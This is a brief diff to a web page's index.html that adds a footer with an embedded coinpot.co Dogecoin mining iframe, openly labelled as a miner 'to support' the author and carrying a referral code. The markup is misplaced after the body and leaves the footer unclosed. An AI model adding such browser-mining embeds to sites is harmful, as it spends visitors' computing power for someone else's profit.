--- a/index.html
+++ b/index.html
@@ -144,4 +144,10 @@
             });
         </script>
     </body>
+		<footer>
+			            <h1 style="font-family: monospace;">Dogecoin Miner To Support Me</h1>
+			<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/dogecoin/?ref=F374612CD53C&mode=widget" style="overflow:hidden;width:324px;height:470px;"></iframe>
+			
+		<footer>
+			
 </html>
